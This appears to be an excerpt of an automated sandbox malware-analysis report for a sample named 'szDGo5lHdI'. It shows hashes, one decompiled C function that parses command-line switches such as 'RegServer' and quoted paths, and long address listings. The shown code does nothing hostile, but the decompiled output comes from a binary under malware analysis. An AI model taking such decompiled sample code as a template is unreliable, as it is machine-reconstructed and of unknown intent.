                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeGlobal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2979337801-0
                                                                                                                                                                                                                                    • Opcode ID: 6fe7bbbb28cd53af7a797c03c8a38af0ffb6b325bfffe95d671f986cc4886e11
                                                                                                                                                                                                                                    • Instruction ID: 12c573750d921541fd6cb29f5945249fc66636a9552ad745523379c0a512c5ca
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fe7bbbb28cd53af7a797c03c8a38af0ffb6b325bfffe95d671f986cc4886e11
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52B0123100020CB7CF001F42ED088453F1DD6C02607000020F90C410218B339821858A
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 00405C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMONCrypto
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E00405C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x408004; // 0x8f135e3b
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00406CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00406E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x408004; // 0x8f135e3b
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0040597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E004044B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x409124 = E00406285();
									_t75 = 0;
								}
								return E00406CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E004044B9(0, 0x521, 0x401140, 0, 0x40, 0);
												_t85 =  *0x408588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0040667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0040667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00405C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00401680(0x408c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0040667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0040667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x408a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00405C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x408b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x408a3a;
																}
																E00401680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0040658A(_t218, 0x104, 0x401140);
																if(E004031E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x408a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x408a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x408a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x408a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x408a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x409a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x409a2c =  *0x409a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x408d48 =  *0x408d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x409a2c =  *0x409a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x409a2c =  *0x409a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x408d48 =  *0x408d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x409a2c =  *0x409a2c | 0x00000004;
																										L70:
																										 *0x408a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x409a2c = 3;
																	 *0x408a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x408a2c != 0 &&  *0x408b3e == 0) {
						if(GetModuleFileNameA( *0x409a3c, 0x408b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E004066C8(0x408b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}


































































                                                                                                                                                                                                                                    0x00405c9e
                                                                                                                                                                                                                                    0x00405ca9
                                                                                                                                                                                                                                    0x00405cb0
                                                                                                                                                                                                                                    0x00405cb3
                                                                                                                                                                                                                                    0x00405cb6
                                                                                                                                                                                                                                    0x00405cb7
                                                                                                                                                                                                                                    0x00405cb8
                                                                                                                                                                                                                                    0x00405cbd
                                                                                                                                                                                                                                    0x00406204
                                                                                                                                                                                                                                    0x00405ccb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405ccb
                                                                                                                                                                                                                                    0x00405cd3
                                                                                                                                                                                                                                    0x00405cd7
                                                                                                                                                                                                                                    0x00405cf4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405cf4
                                                                                                                                                                                                                                    0x00405cf8
                                                                                                                                                                                                                                    0x00405d00
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d06
                                                                                                                                                                                                                                    0x00405d06
                                                                                                                                                                                                                                    0x00405d0e
                                                                                                                                                                                                                                    0x00405d10
                                                                                                                                                                                                                                    0x00405d12
                                                                                                                                                                                                                                    0x00405d14
                                                                                                                                                                                                                                    0x00405d15
                                                                                                                                                                                                                                    0x00405d17
                                                                                                                                                                                                                                    0x00405d49
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d19
                                                                                                                                                                                                                                    0x00405d19
                                                                                                                                                                                                                                    0x00405d1d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d3f
                                                                                                                                                                                                                                    0x00405d3f
                                                                                                                                                                                                                                    0x00405d4b
                                                                                                                                                                                                                                    0x00405d4b
                                                                                                                                                                                                                                    0x00405d4f
                                                                                                                                                                                                                                    0x00405d8d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d93
                                                                                                                                                                                                                                    0x00405d93
                                                                                                                                                                                                                                    0x00405d9a
                                                                                                                                                                                                                                    0x00405d9d
                                                                                                                                                                                                                                    0x00405d9e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d9e
                                                                                                                                                                                                                                    0x00405d51
                                                                                                                                                                                                                                    0x00405d5b
                                                                                                                                                                                                                                    0x00405d72
                                                                                                                                                                                                                                    0x004060fb
                                                                                                                                                                                                                                    0x004060fb
                                                                                                                                                                                                                                    0x00406207
                                                                                                                                                                                                                                    0x0040620a
                                                                                                                                                                                                                                    0x0040620b
                                                                                                                                                                                                                                    0x0040620e
                                                                                                                                                                                                                                    0x00406217
                                                                                                                                                                                                                                    0x00405d78
                                                                                                                                                                                                                                    0x00405d78
                                                                                                                                                                                                                                    0x00405d80
                                                                                                                                                                                                                                    0x00405d83
                                                                                                                                                                                                                                    0x00405d84
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d84
                                                                                                                                                                                                                                    0x00405d5d
                                                                                                                                                                                                                                    0x00405d5f
                                                                                                                                                                                                                                    0x00405d62
                                                                                                                                                                                                                                    0x00405d68
                                                                                                                                                                                                                                    0x00405d64
                                                                                                                                                                                                                                    0x00405d64
                                                                                                                                                                                                                                    0x00405d64
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d62
                                                                                                                                                                                                                                    0x00405d5b
                                                                                                                                                                                                                                    0x00405d4f
                                                                                                                                                                                                                                    0x00405d1d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d9f
                                                                                                                                                                                                                                    0x00405d9f
                                                                                                                                                                                                                                    0x00405da5
                                                                                                                                                                                                                                    0x00405dab
                                                                                                                                                                                                                                    0x00405dba
                                                                                                                                                                                                                                    0x00406218
                                                                                                                                                                                                                                    0x0040621d
                                                                                                                                                                                                                                    0x00406220
                                                                                                                                                                                                                                    0x00406221
                                                                                                                                                                                                                                    0x00406229
                                                                                                                                                                                                                                    0x00406230
                                                                                                                                                                                                                                    0x00406247
                                                                                                                                                                                                                                    0x0040626a
                                                                                                                                                                                                                                    0x00406272
                                                                                                                                                                                                                                    0x00406249
                                                                                                                                                                                                                                    0x00406255
                                                                                                                                                                                                                                    0x0040625f
                                                                                                                                                                                                                                    0x00406264
                                                                                                                                                                                                                                    0x00406264
                                                                                                                                                                                                                                    0x00406284
                                                                                                                                                                                                                                    0x00405dc0
                                                                                                                                                                                                                                    0x00405dc0
                                                                                                                                                                                                                                    0x00405dca
                                                                                                                                                                                                                                    0x00405e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405dcc
                                                                                                                                                                                                                                    0x00405dce
                                                                                                                                                                                                                                    0x00405e24
                                                                                                                                                                                                                                    0x00405e24
                                                                                                                                                                                                                                    0x00405e2c
                                                                                                                                                                                                                                    0x00405e47
                                                                                                                                                                                                                                    0x00405e4a
                                                                                                                                                                                                                                    0x004061d2
                                                                                                                                                                                                                                    0x004061e2
                                                                                                                                                                                                                                    0x004061e7
                                                                                                                                                                                                                                    0x004061ee
                                                                                                                                                                                                                                    0x004061f1
                                                                                                                                                                                                                                    0x004061f1
                                                                                                                                                                                                                                    0x004061f8
                                                                                                                                                                                                                                    0x004061f8
                                                                                                                                                                                                                                    0x00405e50
                                                                                                                                                                                                                                    0x00405e53
                                                                                                                                                                                                                                    0x00406109
                                                                                                                                                                                                                                    0x0040611f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406125
                                                                                                                                                                                                                                    0x00406137
                                                                                                                                                                                                                                    0x0040613a
                                                                                                                                                                                                                                    0x0040613c
                                                                                                                                                                                                                                    0x0040613e
                                                                                                                                                                                                                                    0x0040613e
                                                                                                                                                                                                                                    0x00406141
                                                                                                                                                                                                                                    0x00406141
                                                                                                                                                                                                                                    0x00406143
                                                                                                                                                                                                                                    0x00406144
                                                                                                                                                                                                                                    0x0040614a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406150
                                                                                                                                                                                                                                    0x00406152
                                                                                                                                                                                                                                    0x0040615c
                                                                                                                                                                                                                                    0x00406170
                                                                                                                                                                                                                                    0x00406172
                                                                                                                                                                                                                                    0x0040617c
                                                                                                                                                                                                                                    0x00406190
                                                                                                                                                                                                                                    0x00406190
                                                                                                                                                                                                                                    0x00406196
                                                                                                                                                                                                                                    0x004061a5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004061ab
                                                                                                                                                                                                                                    0x004061b9
                                                                                                                                                                                                                                    0x004061c6
                                                                                                                                                                                                                                    0x004061c6
                                                                                                                                                                                                                                    0x0040617e
                                                                                                                                                                                                                                    0x00406180
                                                                                                                                                                                                                                    0x0040618a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040618a
                                                                                                                                                                                                                                    0x0040615e
                                                                                                                                                                                                                                    0x00406160
                                                                                                                                                                                                                                    0x0040616a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040616a
                                                                                                                                                                                                                                    0x0040615c
                                                                                                                                                                                                                                    0x0040614a
                                                                                                                                                                                                                                    0x0040610b
                                                                                                                                                                                                                                    0x0040610e
                                                                                                                                                                                                                                    0x0040610e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405e59
                                                                                                                                                                                                                                    0x00405e59
                                                                                                                                                                                                                                    0x00405e5c
                                                                                                                                                                                                                                    0x0040604f
                                                                                                                                                                                                                                    0x00406056
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040605c
                                                                                                                                                                                                                                    0x0040606e
                                                                                                                                                                                                                                    0x00406071
                                                                                                                                                                                                                                    0x00406073
                                                                                                                                                                                                                                    0x00406075
                                                                                                                                                                                                                                    0x00406075
                                                                                                                                                                                                                                    0x00406078
                                                                                                                                                                                                                                    0x00406078
                                                                                                                                                                                                                                    0x0040607a
                                                                                                                                                                                                                                    0x0040607b
                                                                                                                                                                                                                                    0x00406081
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406087
                                                                                                                                                                                                                                    0x00406087
                                                                                                                                                                                                                                    0x0040608d
                                                                                                                                                                                                                                    0x0040609c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004060a2
                                                                                                                                                                                                                                    0x004060aa
                                                                                                                                                                                                                                    0x004060b2
                                                                                                                                                                                                                                    0x004060b7
                                                                                                                                                                                                                                    0x004060bd
                                                                                                                                                                                                                                    0x004060bf
                                                                                                                                                                                                                                    0x004060bf
                                                                                                                                                                                                                                    0x004060d6
                                                                                                                                                                                                                                    0x004060e0
                                                                                                                                                                                                                                    0x004060e7
                                                                                                                                                                                                                                    0x004060f5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004060f5
                                                                                                                                                                                                                                    0x0040609c
                                                                                                                                                                                                                                    0x00406081
                                                                                                                                                                                                                                    0x00405e62
                                                                                                                                                                                                                                    0x00405e62
                                                                                                                                                                                                                                    0x00405e65
                                                                                                                                                                                                                                    0x00405fd3
                                                                                                                                                                                                                                    0x00405fe9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405fef
                                                                                                                                                                                                                                    0x00405fef
                                                                                                                                                                                                                                    0x00405ff7
                                                                                                                                                                                                                                    0x00405ffd
                                                                                                                                                                                                                                    0x00406003
                                                                                                                                                                                                                                    0x00406006
                                                                                                                                                                                                                                    0x00406011
                                                                                                                                                                                                                                    0x00406014
                                                                                                                                                                                                                                    0x0040603d
                                                                                                                                                                                                                                    0x00406016
                                                                                                                                                                                                                                    0x00406018
                                                                                                                                                                                                                                    0x00406019
                                                                                                                                                                                                                                    0x0040601b
                                                                                                                                                                                                                                    0x00406033
                                                                                                                                                                                                                                    0x0040601d
                                                                                                                                                                                                                                    0x00406020
                                                                                                                                                                                                                                    0x00406029
                                                                                                                                                                                                                                    0x00406022
                                                                                                                                                                                                                                    0x00406022
                                                                                                                                                                                                                                    0x00406022
                                                                                                                                                                                                                                    0x00406020
                                                                                                                                                                                                                                    0x0040601b
                                                                                                                                                                                                                                    0x00406042
                                                                                                                                                                                                                                    0x00406044
                                                                                                                                                                                                                                    0x00406046
                                                                                                                                                                                                                                    0x0040604a
                                                                                                                                                                                                                                    0x00405ff7
                                                                                                                                                                                                                                    0x00405fd5
                                                                                                                                                                                                                                    0x00405fd8
                                                                                                                                                                                                                                    0x00405fd8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405e6b
                                                                                                                                                                                                                                    0x00405e6b
                                                                                                                                                                                                                                    0x00405e6e
                                                                                                                                                                                                                                    0x00405f8b
                                                                                                                                                                                                                                    0x00405f99
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405f9f
                                                                                                                                                                                                                                    0x00405fa7
                                                                                                                                                                                                                                    0x00405faf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405fb1
                                                                                                                                                                                                                                    0x00405fb3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405fb5
                                                                                                                                                                                                                                    0x00405fb7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405fb9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405fb9
                                                                                                                                                                                                                                    0x00405fb7
                                                                                                                                                                                                                                    0x00405fb3
                                                                                                                                                                                                                                    0x00405faf
                                                                                                                                                                                                                                    0x00405f8d
                                                                                                                                                                                                                                    0x00405f8d
                                                                                                                                                                                                                                    0x00405f8d
                                                                                                                                                                                                                                    0x00405f8f
                                                                                                                                                                                                                                    0x00405fc1
                                                                                                                                                                                                                                    0x00405fc1
                                                                                                                                                                                                                                    0x00405fc1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405e74
                                                                                                                                                                                                                                    0x00405e74
                                                                                                                                                                                                                                    0x00405e77
                                                                                                                                                                                                                                    0x00405ea0
                                                                                                                                                                                                                                    0x00405ebd
                                                                                                                                                                                                                                    0x00405f79
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405f7f
                                                                                                                                                                                                                                    0x00405ec3
                                                                                                                                                                                                                                    0x00405ec3
                                                                                                                                                                                                                                    0x00405ecc
                                                                                                                                                                                                                                    0x00405ed4
                                                                                                                                                                                                                                    0x00405ed6
                                                                                                                                                                                                                                    0x00405edc
                                                                                                                                                                                                                                    0x00405edf
                                                                                                                                                                                                                                    0x00405eea
                                                                                                                                                                                                                                    0x00405eed
                                                                                                                                                                                                                                    0x00405f3f
                                                                                                                                                                                                                                    0x00405f40
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405eef
                                                                                                                                                                                                                                    0x00405eef
                                                                                                                                                                                                                                    0x00405ef2
                                                                                                                                                                                                                                    0x00405f34
                                                                                                                                                                                                                                    0x00405ef4
                                                                                                                                                                                                                                    0x00405ef4
                                                                                                                                                                                                                                    0x00405ef7
                                                                                                                                                                                                                                    0x00405f2b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405ef9
                                                                                                                                                                                                                                    0x00405ef9
                                                                                                                                                                                                                                    0x00405efc
                                                                                                                                                                                                                                    0x00405f22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405efe
                                                                                                                                                                                                                                    0x00405eff
                                                                                                                                                                                                                                    0x00405f02
                                                                                                                                                                                                                                    0x00405f16
                                                                                                                                                                                                                                    0x00405f04
                                                                                                                                                                                                                                    0x00405f07
                                                                                                                                                                                                                                    0x00405f0d
                                                                                                                                                                                                                                    0x00405f46
                                                                                                                                                                                                                                    0x00405f46
                                                                                                                                                                                                                                    0x00405f09
                                                                                                                                                                                                                                    0x00405f09
                                                                                                                                                                                                                                    0x00405f09
                                                                                                                                                                                                                                    0x00405f07
                                                                                                                                                                                                                                    0x00405f02
                                                                                                                                                                                                                                    0x00405efc
                                                                                                                                                                                                                                    0x00405ef7
                                                                                                                                                                                                                                    0x00405ef2
                                                                                                                                                                                                                                    0x00405f4c
                                                                                                                                                                                                                                    0x00405f4e
                                                                                                                                                                                                                                    0x00405f50
                                                                                                                                                                                                                                    0x00405f54
                                                                                                                                                                                                                                    0x00405ed4
                                                                                                                                                                                                                                    0x00405ea2
                                                                                                                                                                                                                                    0x00405ea4
                                                                                                                                                                                                                                    0x00405eaf
                                                                                                                                                                                                                                    0x00405eaf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405e79
                                                                                                                                                                                                                                    0x00405e7d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405e83
                                                                                                                                                                                                                                    0x00405e83
                                                                                                                                                                                                                                    0x00405e83
                                                                                                                                                                                                                                    0x00405e85
                                                                                                                                                                                                                                    0x00405e85
                                                                                                                                                                                                                                    0x00405e8e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405e94
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405e94
                                                                                                                                                                                                                                    0x00405e8e
                                                                                                                                                                                                                                    0x00405e7d
                                                                                                                                                                                                                                    0x00405e77
                                                                                                                                                                                                                                    0x00405e6e
                                                                                                                                                                                                                                    0x00405e65
                                                                                                                                                                                                                                    0x00405e5c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405dd0
                                                                                                                                                                                                                                    0x00405dd0
                                                                                                                                                                                                                                    0x00405dd0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405dd0
                                                                                                                                                                                                                                    0x00405dce
                                                                                                                                                                                                                                    0x00405dca
                                                                                                                                                                                                                                    0x00405dba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d00
                                                                                                                                                                                                                                    0x00405dd9
                                                                                                                                                                                                                                    0x00405e04
                                                                                                                                                                                                                                    0x004061fe
                                                                                                                                                                                                                                    0x00405e0a
                                                                                                                                                                                                                                    0x00405e0c
                                                                                                                                                                                                                                    0x00405e17
                                                                                                                                                                                                                                    0x00405e17
                                                                                                                                                                                                                                    0x00405e04
                                                                                                                                                                                                                                    0x00406200
                                                                                                                                                                                                                                    0x00406200
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharNextA.USER32(?,00000000,?,?), ref: 00405CEE
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00408B3E,00000104,00000000,?,?), ref: 00405DFC
                                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00405E3E
                                                                                                                                                                                                                                    • CharUpperA.USER32(-00000052), ref: 00405EE1
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00405F6F
                                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00405FA7
                                                                                                                                                                                                                                    • CharUpperA.USER32(-0000004E), ref: 00406008
                                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 004060AA
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00401140,00000000,00000040,00000000), ref: 004061F1
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004061F8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
